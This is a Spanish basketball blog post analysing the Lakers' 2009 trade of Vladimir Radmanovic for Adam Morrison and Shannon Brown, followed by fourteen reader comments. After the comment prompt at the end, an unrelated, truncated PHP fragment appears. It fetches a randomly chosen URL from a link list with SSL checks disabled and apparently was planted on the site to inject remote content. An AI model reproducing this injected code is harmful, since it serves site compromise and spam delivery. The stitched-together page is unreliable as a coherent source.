El movimiento estratégico de VladRad

09 de February de 2009 por El_Pecharroman

En los últimos días se había especulado incesantemente con la salida de Lamar Odom de Los Ángeles Lakers a cambio de un pívot de categoría para sustituir al lesionado Andrew Bynum y, a la vuelta de este, convertirse en una suerte de sexto hombre que diera descanso al propio Bynum y a Pau Gasol. Se hablaba de de que, con Odom, irían empaquetados algunos de los hombres interiores de relleno amarillos como Chris Mihm, DJ Mbenga ó Josh Powell. Los elegidos por los Lakers, siempre según lo que se hablaba, eran Brad Miller (Sacramento) y Amare Stoudamire (Phoenix)…

Finalmente, nada de esto es verdad. De momento. Se ha producido un traspaso en los Lakers, sí, pero el involucrado no ha sido Odom sino Radmanovic; el equipo receptor no ha sido Phoenix ni Sacramento, sino Charlotte; el llegado no ha sido un pívot de calidad, sino un alero y un base de nivel medio ó bajo.

Vladimir Radmanovic deja los Lakers y se puede decir que se va como vino en 2006 desde los Clippers, sólo que con algo más de caché y unas finales de la NBA en su haber. Durante estos dos años y medio de vida ‘laker’, el serbio ha competido por el puesto de ‘point forward’ con suerte desigual frente a un Luke Walton que le ganaba la partida por su mayor experiencia bajo las órdenes de Phil Jackson… y que resultaba derrotado frente a VladRad por el mejor lanzamiento exterior de éste. Desde octubre pasado, la explosión de Trevor Ariza dejó sin sitio en el equipo a uno de los dos, o a Walton o a Radmanovic. Ahora bien, ¿por qué el traspasado ha sido el europeo y no el americano?Aquí el factor determinante ha sido, sin lugar a dudas, el contrato de Radmanovic. En los dos próximos años absorbería 13 millones de dólares en total, algo ciertamente desorbitado para un jugador cuyo rol en este equipo (que, no olvidemos, soporta los contratos de Gasol, Bynum, Bryant y Odom) es el de mero relleno. Con su trade, los Lakers únicamente pierden a un ocasional titular cuya aportación ha ido bajando año a año (en 2007, 8’4 puntos y 3’3 rebotes; en 2008, 5’9 puntos y 2’5 rebotres) y cuya mayor cualidad es el lanzamiento de tres. Un jugador que puede ser más útil en un equipo de menor calado, donde pueda sentirse y ser importante, lanzar tiros decisivos, etc. Como en su mejor época hasta la fecha, en las filas de los difuntos Seattle Supersonics. Los Charlotte Bobcats, por tanto, parecen un buen destino para VladRad.

¿Qué ha venido a cambio? Dos jugadores, medianos e incluso algo peores, pero con contratos muchos más desahogados. Adam Morrison es un ‘point forward’ más famoso por ser una de las grandes pifias de Michael Jordan como GM (3ª elección en el draft de 2006) que por sus cualidades deportivas, que se limitan a un lanzamiento exterior relativamente decente; con Walton y Ariza por delante, no jugará mucho. Por su parte, Shannon Brown es un base ó escolta atlético cuyas escasas cualidades abundan más en lo defensivo que en lo ofensivo, un trotamundos a pequeña escala (en tres años, cuatro equipos: Cleveland, Chicago, Charlotte y ahora Lakers) cuyo rol pasará por ser una alternativa a Farmar y Fisher cuando la ocasión lo requiera.

Deportivamente es fácil deducir que la franquicia no ha salido ganando, a pesar de que tuviera poco que perder. Ahora llegamos a la parte buena de la operación para los Lakers: Morrison tiene un contrato de apenas cinco millones que dura hasta 2010, mientras Brown es un ‘expiring’ que no llega al millón de dólares.

Se trata, por tanto, de un movimiento estratégico al que se le puede buscar una doble lectura. Por un lado, es de ley pensar en que los Lakers se quieren asegurar un cierto margen salarial para poder renovar al alza a Ariza e incluso a Odom. Por otra parte, y esta es la posibilidad por la que yo me inclino, el tándem Kupchak-Jackson que maneja los destinos de la franquicia angelina ha buscado reclutar un par de contratos relativamente interesantes para salir al mercado y hacerse con el pívot de calidad que mencionábamos al principio. Y, aparte de Miller y Stoudamire, hay un jugador casi franquicia que quiere salir de su equipo, cuyo contrato encaja con los de Odom, los recién llegados e incluso alguno de la terna Mihm-Mbenga-Powell. Hablo de Chris Bosh, que seguramente no vería con malos ojos llegar a los Lakers aunque sea en un rol más secundario que el desempeñado actualmente en Toronto. Además, a Calderón no le vendría mal contar con un jugador más móvil como Odom en el equipo, amén de que un Mihm con ritmo de competición puede ser superior al inconsistente Voskhul. ¿Lo pensamos?

Comenta

14 comentarios a esta entrada

  1. AGOT dice:
    #1

    Muy buenas a todos:

    De acuerdo en todo, pero, yo personalmente prefiero a un Odom en LA que puede asumir el roll de secudario o protagonista cuando se tercie y hacerlo de lujo (como ultimamente) que un Bosh que no creo que aceptara lo primero.
    A quien yo si que me traia de cabeza de los Raptors es a Jose por Fisher, pero de aqui a Lima.

      Citar

  2. MagicJohnson32 dice:
    #2

    No creo que los planes de Kupchack vayan tan lejos. Creo que se ha hecho hueco para renovar a Ariza, y punto. Además, en lo deportivo siempre cabe la posibilidad de que Morrison resucite.

    En definitiva, lo que se pierde sin Radmanovic es mínimo, porque Vujacic hace mejor papel como especialista, y los beneficios económicos son evidentes.

      Citar

  3. underlock dice:
    #3

    Para mi en esta operacion salen ganando los Lakers.

    Se quitan a un jugador que cada vez tenia menos peso en el equipo, jugaba sin ganas y al parecer creaba mal ambiente en el vestuario últimamente. Ademas como tú has comentado, se quitan un contrato grande.

    Mientras, se traen a dos jugadores jóvenes que mejoran el banquillo con contratos bajos y que seguro que aportan mas que Radmanovic.

    Respecto a Bosh, no estoy deacuerdo. No creo que CB4 este dispuesto a ser el 3er jugador importante del equipo, y no creo que los Lakers intenten traerlo. Lo que si necesitan es un jugador interior de garantías, porque si Bynum no se recupera en condiciones de aquí a final de temporada, Gasol va a llegar fundido a los playoffs jugando casi 45 minutos por partido.

      Citar

  4. Viva_Dirk dice:
    #4

    Elegir a Morrison en el Nº3 no solo no es una cagada sino que de aquel draft lo normal es que hubiese sido Nº1, y definir sus cualidades como ‘un tiro exterior relativamente decente’ es desconocer completamente su juego.

    EN cuanto a traspasar a Odom, creo que es imposible porque cumple funciones tanto de hombre interior ahora que hace falta como exterior sin ningun problema, traer a un interior puro del nivel de Amare o Bosh supondria cortar de raiz a Bynum y perder poderío exterior.

      Citar

  5. Fran Reyes dice:
    #5

    @ VivaDirk

    Pues tío, si te digo la verdad yo no lo he visto jugar. Antes de escribir el artículo, miré estadísticas y busqué información sobre Adam en foros americanos. También leí después el blog de Daimiel. Y mayormente lo que se hablaba era eso, aparte había opiniones que lo ponían como una basura de jugador y otras que decían incluso que era un gran defensor. Respecto al draft; sé que fue flojito, no en vano el número 1 si mal no recuerdo fue Andrea Bargagni.

    ¿Qué aporta al juego aparte de tiro exterior? (no lo digo con retintín, es que no sé si aporta algo más 🙂 )

      Citar

  6. Txusma dice:
    #6

    Viva es un enamorado de Morrison pero yo creo q en la universidad demostro ser algo mas que un jugador con un tiro exterior decente. Mas bien lo calificaria como un autentico killer y es sus duelos con JJ Redick casi se podrian catalogar de legendarios. Su primer año en la NBA no fue malo del todo aunq posiblemente por todas las expectactivas levantadas, algunos lo puedan catalogar como decepcionante. El segundo año casi no lo jugo por lesion y ahora en el tercero no cuenta casi para Larry Brown, del q ya sabemos sus gustos en cuanto a tipos de jugadores se refiere.
    Jackson tiene un buen material para pulir en Adam Morrison, en el q todavia sigo confiando. No tal vez para ser una megaestrella de la NBA, pero si para gozar de una mas que digna carrera.

      Citar

  7. Viva_Dirk dice:
    #7

    Ey, no iba con nada de mala leche ni nada el comentario eh, es que me ha salido así.

    Morrison puede aportar anotación a raudales, no solo desde la larga distancia sino en todo tipo de acciones salvo mates expectaculares, jeje. A parte de eso se mueve muy muy bien buscando la mejor posición y desahogar al compañero, no tengo ninguna duda de que si coincide con Kobe&Pau(y Odom) se aprovechará al máximo de ello.

    Esa es su gran virtud, luego aunque es buen conocedor del juego no es buen pasador, que quiza es su mayor defecto, no digo que sea egoista si no que no pasa bien. Cuida bastante bien del balón sin cometer pérdidas ni meterse en jardines, no es mal reboteador pese a su físico, y aunque lo parezca no es un jugador blando.

      Citar

  8. Elio dice:
    #8

    No creo que los Lakers estén buscando el fichaje de Chris Bosh, en mi opinión no les hace tanta falta ya que Bynum no va a estar un año lesionado, sino entre 2 y 3 meses (esperemos).

    Lo que sí han hecho es un movimiento que les permita mayor libertad de cara a renovar a Odom, Ariza o buscar un traspaso inteligente que les permita seguir dominando la liga algún año más.

      Citar

  9. Viru dice:
    #9

    ¡Echaré de menos a Radman! Me caía muy bien.

      Citar

  10. Jabho dice:
    #10

    Yo estoy con Txus, Morrison ha tenido una carrera muy irregular por las circunstancias, pero bien llevado y con paciencia puede ser una versión mejorada de Vujacic y aportar anotación desde el banco sin problemas. Veremos si Jakson saca más de el que Brown.

    Radma por contra lo que aportaba a los Lakers lo seguirán aportando los que jueguen sus minutos. Por ahí no hay perdida.

    Buen movimiento Laker.

      Citar

  11. Txusma dice:
    #11

    Y una cosa más: Morrison está muy bien pero no me olvidaría de Shannon Brown. Aparte de hacer estrategos en mi NBA2k7 :D, creo q es un jugador que puede aportar bastante como suplente en las posiciones de 1 y 2. Con Fisher, Vujacic, Farmar, Brown y el chico ese que lleva el 24 creo q los amarillos van mas que servidos.

      Citar

  12. MagicJohnson32 dice:
    #12

    Ya os digo ahora que me parece que Brown jugará más que Morrison, al menos al principio. Es buen defensor, un jugador agresivo y puede echar una mano como rotación de perímetro, sobre todo para liberar a Bryant de marcar al mejor jugador rival en determinados momentos.

      Citar

  13. couxe dice:
    #13

    Yo también creo que es un buen movimiento de los Lakers, ya que, como comentais, les permite no perder en lo deportivo y ganar en margen de maniobra.
    Sin embargo no veo que estén preparando grandes cambios tipo el que se comenta de Bosh, ya que en principio la lesión de Bynum no es demasiado grave (aunque tampoco lo era la pasada temporada), y además, incluso sin él, el equipo va de maravilla…

      Citar

  14. Viva_Dirk dice:
    #14

    Si, Shannon también es una buena incorporación y coincido con Magic en que de primeras tiene mas minutos ‘disponibles’ que Morrison.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>